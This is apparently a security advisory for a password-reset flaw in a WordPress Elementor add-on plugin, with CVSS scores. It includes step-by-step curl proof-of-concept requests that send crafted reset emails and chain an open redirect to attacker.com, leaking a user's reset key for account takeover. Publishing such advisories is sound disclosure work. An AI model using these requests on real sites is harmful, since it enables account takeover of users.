5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
The plugin did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover.
The vulnerable code leading to the issue is inside the function "theplus_ajax_forgot_password_ajax" in "theplus_elementor_addon/includes/plus_addon.php".
To be exploitable, the widget 'WP Login & Register' should be activated and present on a page of the wordpress site
First, you should go to the page where the widget is present and open the developer console to get the nonce called "tp_user_lost_password_nonce".
Once you get the nonce, you can exploit the function with the following request:
curl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user_login=john&f_p_opt=f_p_frontend&nonce=nonce_you_got&tceol[tp_cst_email_lost_opt]=yes&tceol[tp_cst_email_lost_subject]=Hey&tceol[tp_cst_email_lost_message]=Hello from my wordpress site'
where john is a registered user on the wordpress site. John will received an email with Subject 'Hey' and body 'Hello from my wordpress site'
If we include ‘[tplr_link]’ in the email body, it will be replaced by a password reset link, for example:
curl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user_login=john&f_p_opt=f_p_frontend&nonce=nonce_you_got&tceol[tp_cst_email_lost_opt]=yes&tceol[tp_cst_email_lost_subject]=Hey&tceol[tp_cst_email_lost_message]=Link : [tplr_link]'
John will receive an email with subject 'Hey' and body 'Link : http://localhost/wordpress/wp-login.php?action=theplusrp&key=9aMCdd1ugxQc65dWot3i&redirecturl=&forgoturl=&login=john'
It is possible to chain this vulnerability with an open redirect reported separately, with the request :
curl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user_login=john&f_p_opt=f_p_frontend&nonce=nonce_you_got&tceol[tp_cst_email_lost_opt]=yes&tceol[tp_cst_email_lost_subject]=Hey&tceol[tp_cst_email_lost_message]=Hello, check our new post : [tplr_link]&resetpageurl=http://attacker.com&forgotpageurl=http://attacker.com'
John will receive an email with body :
'Hello, check our new post : http://localhost/wordpress/wp-login.php?action=theplusrp&key=9aMCdd1ugxQc65dWot3i&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login=john'
If he clicks the link, he will be redirected to http://attacker.com/?login=john&key=9aMCdd1ugxQc65dWot3i&action=theplusrp
So the attacker gets the key to reset john password, he can do so by visiting the page where the widget is present with the parameters he got, for example : http://localhost/wordpress/hello-world/?action=theplusrp&login=john&key=9aMCdd1ugxQc65dWot3i
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N